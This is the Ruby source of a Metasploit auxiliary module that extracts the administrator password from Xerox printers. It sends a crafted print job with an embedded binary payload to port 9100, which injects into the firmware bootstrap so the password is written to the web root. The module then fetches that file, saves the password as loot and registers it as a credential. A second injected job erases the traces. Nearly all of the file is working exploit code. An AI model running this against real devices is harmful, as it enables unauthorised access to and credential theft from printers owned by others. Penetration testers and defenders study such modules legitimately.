# # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report def initialize(info={}) super(update_info(info, 'Name' => 'Xerox Administrator Console Password Extract', 'Description' => %{ This module will extract the management consoles admin password from the Xerox file system using firmware bootstrap injection. }, 'Author' => [ 'Deral "Percentx" Heiland', 'Pete "Bokojan" Arzamendi' ], 'License' => MSF_LICENSE )) register_options( [ OptPort.new('RPORT', [true, 'Web management console port for the printer', 80]), OptPort.new('JPORT', [true, 'Jetdirect port', 9100]), OptInt.new('TIMEOUT', [true, 'Timeout to wait for printer job to run', 45]) ], self.class) end def jport datastore['JPORT'] end # Time to start the fun def run print_status("#{rhost}:#{jport} - Attempting to extract the web consoles admin password...") return unless write print_status("#{rhost}:#{jport} - Waiting #{datastore['TIMEOUT']} seconds...") sleep(datastore['TIMEOUT']) passwd = retrieve remove if passwd print_good("#{rhost}:#{jport} - Password found: #{passwd}") loot_name = 'xerox.password' loot_type = 'text/plain' loot_filename = 'xerox_password.text' loot_desc = 'Xerox password harvester' p = store_loot(loot_name, loot_type, datastore['RHOST'], passwd, loot_filename, loot_desc) print_status("#{rhost}:#{jport} - Credentials saved in: #{p}") register_creds('Xerox-HTTP', rhost, rport, 'Admin', passwd) else print_error("#{rhost}:#{jport} - No credentials extracted") end end #Trigger firmware bootstrap write out password data to URL root def write print_status("#{rhost}:#{jport} - Sending print job") create_print_job = '%%XRXbegin' + "\x0a" create_print_job << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0a" create_print_job << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0a" create_print_job << '%%OID_ATT_JOB_COMMENT ""' + "\x0a" create_print_job << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0a" create_print_job << '%%OID_ATT_DLM_NAME "xerox"' + "\x0a" create_print_job << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0a" create_print_job << '%%OID_ATT_DLM_SIGNATURE "8ba01980993f55f5836bcc6775e9da90bc064e608bf878eab4d2f45dc2efca09"' + "\x0a" create_print_job << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0a" create_print_job << '%%XRXend' + "\x0a\x1f\x8b" create_print_job << "\x08\x00\x80\xc3\xf6\x51\x00\x03\xed\xcf\x3b\x6e\xc3\x30\x0c\x06" create_print_job << "\x60\xcf\x39\x05\xe3\xce\x31\x25\xa7\x8e\xa7\x06\xe8\x0d\x72\x05" create_print_job << "\x45\x92\x1f\x43\x2d\x43\x94\x1b\x07\xc8\xe1\xab\x16\x28\xd0\xa9" create_print_job << "\x9d\x82\x22\xc0\xff\x0d\x24\x41\x72\x20\x57\x1f\xc3\x5a\xc9\x50" create_print_job << "\xdc\x91\xca\xda\xb6\xf9\xcc\xba\x6d\xd4\xcf\xfc\xa5\x56\xaa\xd0" create_print_job << "\x75\x6e\x35\xcf\xba\xd9\xe7\xbe\xd6\x07\xb5\x2f\x48\xdd\xf3\xa8" create_print_job << "\x6f\x8b\x24\x13\x89\x8a\xd9\x47\xbb\xfe\xb2\xf7\xd7\xfc\x41\x3d" create_print_job << "\x6d\xf9\x3c\x4e\x7c\x36\x32\x6c\xac\x49\xc4\xef\x26\x72\x98\x13" create_print_job << "\x4f\x96\x6d\x98\xba\xb1\x67\xf1\x76\x89\x63\xba\x56\xb6\xeb\xe9" create_print_job << "\xd6\x47\x3f\x53\x29\x57\x79\x75\x6f\xe3\x74\x32\x22\x97\x10\x1d" create_print_job << "\xbd\x94\x74\xb3\x4b\xa2\x9d\x2b\x73\xb9\xeb\x6a\x3a\x1e\x89\x17" create_print_job << "\x89\x2c\x83\x89\x9e\x87\x94\x66\x97\xa3\x0b\x56\xf8\x14\x8d\x77" create_print_job << "\xa6\x4a\x6b\xda\xfc\xf7\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00" create_print_job << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xea\x03\x34\x66\x0b\xc1" create_print_job << "\x00\x28\x00\x00" begin connect(true, 'RPORT' => jport) sock.put(create_print_job) rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse print_error("#{rhost}:#{jport} - Error connecting to #{rhost}") ensure disconnect end end def retrieve print_status("#{rhost}:#{jport} - Retrieving password from #{rhost}") request = "GET /Praeda.txt HTTP/1.0\r\n\r\n" begin connect sock.put(request) res = sock.get_once || '' passwd = res.match(/\r\n\s(.+?)\n/) return passwd ? passwd[1] : '' rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse, EOFError print_error("#{rhost}:#{jport} - Error getting password from #{rhost}") return ensure disconnect end end # Trigger firmware bootstrap to delete the trace files and praeda.txt file from URL def remove print_status("#{rhost}:#{jport} - Removing print job") remove_print_job = '%%XRXbegin' + "\x0A" remove_print_job << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A" remove_print_job << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A" remove_print_job << '%%OID_ATT_JOB_COMMENT ""' + "\x0A" remove_print_job << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0A" remove_print_job << '%%OID_ATT_DLM_NAME "xerox"' + "\x0A" remove_print_job << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0A" remove_print_job << '%%OID_ATT_DLM_SIGNATURE "8b5d8c631ec21068211840697e332fbf719e6113bbcd8733c2fe9653b3d15491"' + "\x0A" remove_print_job << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0A" remove_print_job << '%%XRXend' + "\x0a\x1f\x8b" remove_print_job << "\x08\x00\x5d\xc5\xf6\x51\x00\x03\xed\xd2\xcd\x0a\xc2\x30\x0c\xc0" remove_print_job << "\xf1\x9e\x7d\x8a\x89\x77\xd3\x6e\xd6\xbd\x86\xaf\x50\xb7\xc1\x04" remove_print_job << "\xf7\x41\xdb\x41\x1f\xdf\x6d\x22\x78\xd2\x93\x88\xf8\xff\x41\x92" remove_print_job << "\x43\x72\x48\x20\xa9\xf1\x43\xda\x87\x56\x7d\x90\x9e\x95\xa5\x5d" remove_print_job << "\xaa\x29\xad\x7e\xae\x2b\x93\x1b\x35\x47\x69\xed\x21\x2f\x0a\xa3" remove_print_job << "\xb4\x31\x47\x6d\x55\xa6\x3f\xb9\xd4\xc3\x14\xa2\xf3\x59\xa6\xc6" remove_print_job << "\xc6\x57\xe9\xc5\xdc\xbb\xfe\x8f\xda\x6d\xe5\x7c\xe9\xe5\xec\x42" remove_print_job << "\xbb\xf1\x5d\x26\x53\xf0\x12\x5a\xe7\x1b\x69\x63\x1c\xeb\x39\xd7" remove_print_job << "\x43\x15\xe4\xe4\x5d\x53\xbb\x7d\x4c\x71\x9d\x1a\xc6\x28\x7d\x25" remove_print_job << "\xf5\xb5\x0b\x92\x96\x0f\xba\xe7\xf9\x8f\x36\xdf\x3e\x08\x00\x00" remove_print_job << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xc4\x0d\x40\x0a" remove_print_job << "\x75\xe1\x00\x28\x00\x00" begin connect(true, 'RPORT' => jport) sock.put(remove_print_job) rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse print_error("#{rhost}:#{jport} - Error removing print job from #{rhost}") ensure disconnect end end def register_creds(service_name, remote_host, remote_port, username, password) credential_data = { origin_type: :service, module_fullname: self.fullname, workspace_id: myworkspace.id, private_data: password, private_type: :password, username: username } service_data = { address: remote_host, port: remote_port, service_name: service_name, protocol: 'tcp', workspace_id: myworkspace_id } credential_data.merge!(service_data) credential_core = create_credential(credential_data) login_data = { core: credential_core, status: Metasploit::Model::Login::Status::UNTRIED, workspace_id: myworkspace_id } login_data.merge!(service_data) create_credential_login(login_data) end end